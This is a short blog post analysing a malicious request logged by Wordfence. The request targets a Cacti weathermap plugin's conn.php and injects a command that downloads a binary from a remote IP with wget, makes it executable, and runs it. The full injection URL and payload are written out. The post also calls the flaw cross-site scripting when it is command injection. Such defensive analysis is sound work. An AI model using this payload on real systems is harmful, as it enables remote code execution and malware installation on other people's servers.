#WordPress weather map plugin attack detected in #wordfence live traffic

By | January 10, 2018

Going through my Wordfence live traffic view is a nice way to see the daily fad of Chinese script kiddies.

WordPress is one of the main targets of people trying to access your data. Obviously if you have a blog you must be sure you run an A+ certified security setup. See my other posts for this:
Security: Maintaining a secure WordPress blog
“A” Rating Security – Strong SSL Security WordPress Blog

Today I got this nice request repeated several times from several China IPs.

https://blog.voina.org/plugins/weathermap/configs/conn.php?id=wget%20http://182.18.8.69:8088/nkrb;chmod%20777%20nkrb;./nkrb

Let’s make a quick check of the request:

STEP 1: The attack vector:
It seems there is a vulnerability in one of the weather PHP plugins Cacti that can be installed on a WordPress site. The hint is in the URL path:

.../plugins/weathermap/configs/conn.php?id=

It seems that this plugin has a conn.php that is not doing any escaping of parameters so being open to cross site scripting attack. Maybe a known issue no longer valid in newer versions but still valid for a lot of installs.

STEP 2: The attack load

wget%20http://182.18.8.69:8088/nkrb;chmod%20777%20nkrb;./nkrb

This is an interesting attack load that is targeted for Linux. This is a clear indication that the attacker is checking the OS of the target.
The whole string is a sequence of Linux command line items.

First a file is downloaded from a repository machine.

wget http://182.18.8.69:8088/nkrb

The machine is listed as an attack vector site

The downloaded binary is made executable:

chmod 777 nkrb

The binary is executed:

./nkrb

Probably the binary is a ransom-ware or crypto-mining binary.

Contribute to this site maintenance !

This is a self hosted site, on own hardware and Internet connection. The old, down to earth way 🙂. If you think that you found something useful here please contribute. Choose the form below (default 1 EUR) or donate using Bitcoin (default 0.0001 BTC) using the QR code. Thank you !

€1.00

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.